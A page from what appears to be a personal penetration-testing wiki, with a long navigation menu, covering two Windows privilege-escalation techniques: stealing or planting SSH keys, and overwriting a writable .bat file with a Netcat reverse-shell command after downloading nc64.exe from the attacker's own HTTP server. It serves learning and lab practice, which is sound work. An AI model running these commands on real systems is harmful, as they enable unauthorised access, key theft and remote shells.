Hacking Knowledge
  • 🏠​ Homepage
    • Welcome
    • About Me
    • Disclaimer
    • Conventions
  • 🔑Cybersecurity Basics
    • Introduction
    • Vulnerabilities
    • Cyberattacks
      • Cyber Kill Chain
      • Malware
    • Security Models
      • Methodologies
    • Legal Support
    • Career Paths
    • Certifications
    • Related Concepts
  • 🐧Linux
    • Introduction
    • Functional Structure
      • File Permissions
      • Environment Variables
      • Crontabs
    • Commands
      • Operators
    • Useful Shell Resources
    • Related Concepts
  • ⊞ Windows
    • Introduction
    • Functional Structure
      • File Permissions
      • Environment Variables and System Tools
      • System Events
    • Commands
    • Related Concepts
  • 🌐Networks
    • Introduction
    • Networking Frameworks
      • OSI Model
      • TCP/IP Model
    • Protocols
      • ARP
      • TCP
      • NetBIOS
      • SNMP
      • DNS
      • HTTP
      • Telnet
      • FTP
      • TFTP
      • SMB
      • RDP
      • SSH
      • SMTP
      • POP 3
      • IMAP
      • Oracle TNS
      • IPMI
    • Hypervisors
    • Related Concepts
    • Tools and Utilities
  • 🔐Cryptography
    • Introduction
    • Encoding (WIP)
    • Encryption (WIP)
      • Types of encryption (WIP)
      • Methods of Encryption (WIP)
    • Hashing
      • Well-known Hashes (WIP)
    • Related Concepts
    • Tools and Utilities
    • Useful Tips
  • 👣Digital Forensics
    • Introduction
    • Basic Plan
    • Related Concepts
    • Tools and Utilities
    • Useful Tips
  • 🎯Penetration Testing
    • Introduction
    • Categorization
    • Process Stages
      • Pre-engagement
      • Information Gathering
        • OSINT
          • Dorking
          • Searching breach data dumps
        • Enumeration
          • Get information from SSL certificates
          • Retrieve information from IMAP/POP3 servers
          • Redirect HTTP traffic using Feroxbuster and ZAP
          • Mount accesible NFS Shares
          • Bruteforce subdomains
        • Tools and Utilities
        • Useful Tips
      • Vulnerability Assessment
      • Exploitation
        • Tools and Utilities
        • Useful Tips
      • Post-Exploitation
        • Techniques (WIP)
        • Privilege Escalation
          • Linux Privilege Escalation
          • Windows Privilege Escalation
        • Tools and Utilities
        • Useful Tips
      • Lateral Movement
      • Proof-of-Concept
      • Post-engagement
        • Sample Report (WIP)
    • Related Concepts
  • 📡Web Exploitation
    • Introduction
    • OWASP Top 10
      • Broken Access Control
      • Cryptographic Failures
      • Injection
      • Insecure Design
      • Security Misconfiguration
      • Vulnerable and Outdated Components
      • Identification and Authentication Failures
      • Software and Data Integrity Failures
      • Security Logging and Monitoring Failures
      • Server-side Request Forgery
    • Attack Techniques
      • Local File Inclusion
      • Remote File Inclusion
      • Cross-Site Scripting
      • Command injection
      • XXE Injection
      • Abuse File Upload
      • Cross-Site Request Forgery
      • Header Poisoning
      • HTTP Parameter Pollution
      • Content Security Policy Bypass
      • Exposed .htaccess and .htpasswd files
      • Server-Side Request Forgery
      • Server-Side Template Injection
      • Cookie Hijacking
      • Null Byte Poisoning
      • PHP - Abuse PHP Type Juggling
      • PHP - Bypass using filters
      • WordPress - Abuse Theme Configuration on templates
      • WordPress - Getting credentials from configuration files
      • CVE - Log4Shell
    • Related Concepts
    • Tools and Utilities
    • Useful Tips
  • 🗄️Database Attacks
    • Introduction
    • SQL
      • MySQL
      • MSSQL
      • SQLite3
    • Attack Techniques
      • SQL Injection
        • Authentication Bypass
      • NoSQL Injection
      • MS SQL - xp_cmdshell Abuse
      • MongoDB - Impersonation via credentials change
    • Related Concepts
    • Tools and Utilities
    • Useful Tips
  • 👥Active Directory
    • Introduction
    • Related Concepts (WIP)
    • Tools and Utilities (WIP)
    • Useful Tips (WIP)
  • ☁️CLOUD HACKING
    • Introduction
    • Related Concepts
    • Tools and Utilities (WIP)
    • Useful Tips (WIP)
  • 📜Scripting
    • Introduction
    • Reverse Shell
    • Bind shell
    • Web Shell
  • 🚩Practical Skill Development
    • Learning Platforms
      • Hack The Box
      • TryHackMe
      • picoCTF
    • Featured Labs
    • CTF Competitions
  • 📝Write-Ups
    • Introduction
    • HTB Starting Point
      • Meow (Tier 0)
      • Fawn (Tier 0)
      • Dancing (Tier 0)
      • Redeemer (Tier 0)
      • Explosion (Tier 0)
      • Preignition (Tier 0)
      • Mongod (Tier 0)
      • Synced (Tier 0)
      • Appointment (Tier 1)
      • Sequel (Tier 1)
      • Crocodile (Tier 1)
      • Responder (Tier 1)
      • Three (Tier 1)
      • Ignition (Tier 1)
      • Bike (Tier 1)
      • Funnel (Tier 1)
      • Pennyworth (Tier 1)
      • Tactics (Tier 1)
      • Archetype (Tier 2)
      • Oopsie (Tier 2)
      • Vaccine (Tier 2)
      • Unified (Tier 2)
      • Included (Tier 2)
      • Markup (Tier 2)
      • Base (Tier 2)
    • HTB Machines
      • Nibbles (Easy)
      • BountyHunter (Easy)
      • Crafty (Easy)
      • Chemistry (Easy)
    • HTB Challenges
    • HTB Advanced labs
  • Group 1
Powered by GitBook
On this page
  • Abusing SSH keys
  • Abusing .bat files with full control permissions

Was this helpful?

  1. Penetration Testing
  2. Process Stages
  3. Post-Exploitation
  4. Privilege Escalation

Windows Privilege Escalation

Here are some techniques for achieving privilege escalation on Windows systems:

Abusing SSH keys

  • Check if we have reading permissions on the SSH private keys of a user

#On the target machine
type C:\Users\$user\.ssh\$keyfile    #For a user

Standard key files are called id_rsa

  • Copy the keys to a file, assign permissions to the file, and use it to log in using the key

#On our machine
nano $filename #Copy here the keys
chmod 600 $filename
ssh $username@$IP -i $filename

Use chmod 600 id_rsa to assign restrictive permissions and the SSH does not block this method

  • When having writing permissions on the .ssh/ directory of a user, we can generate an SSH key with the current user and pass it to the system

ssh-keygen -f $keyfile

This will generate the file with a private key for the user and a .pub file with a public key

  • Pass the public key to the authorized keys file of the root user

type $keyfilename.pub > C:\Users\$user\.ssh\authorized_keys

  • Use this to log in to the user using the key

ssh $username@$IP -i $keyfile

Abusing .bat files with full control permissions

In the situation where a .bat file (script file for Windows) is being executed on the system and it has full-control permissions, it's possible to abuse this to modify the content of the .bat file and execute commands with privileges arbitrarily

  • Try spawning a PowerShell from the CMD with any user we have access

...> powershell
PS ...>            #If it worked the command line will look like this

  • Find a .bat file, and check if it has full-control permissions. In case it has, check if it is calling any process and if any of them is still running

icacls $batFile #Check permissions
cat $batFile    #Check the content to know if is calling any process
ps              #Check if called processes are still running

  • Download and import a Netcat executable for Windows

# In our machine
wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe #Get NC executable
python3 -m http.server $myPort #On the folder where we have the executable

# In the target machine
wget http://$myIP:$myPort/nc64.exe -outfile nc64.exe

  • Set Netcat listener to catch the connection and replace the content of the .bat file with a command spawning the Netcat executable

# In our machine
nc -nvlp $ncPort

# In the target machine
echo $ncFilePath -e cmd.exe $myIP $ncPort > $batFilePath

Then we just had to wait for the system to run again the script, now executing our payload

PreviousLinux Privilege EscalationNextTools and Utilities

Last updated 2 months ago

Was this helpful?

🎯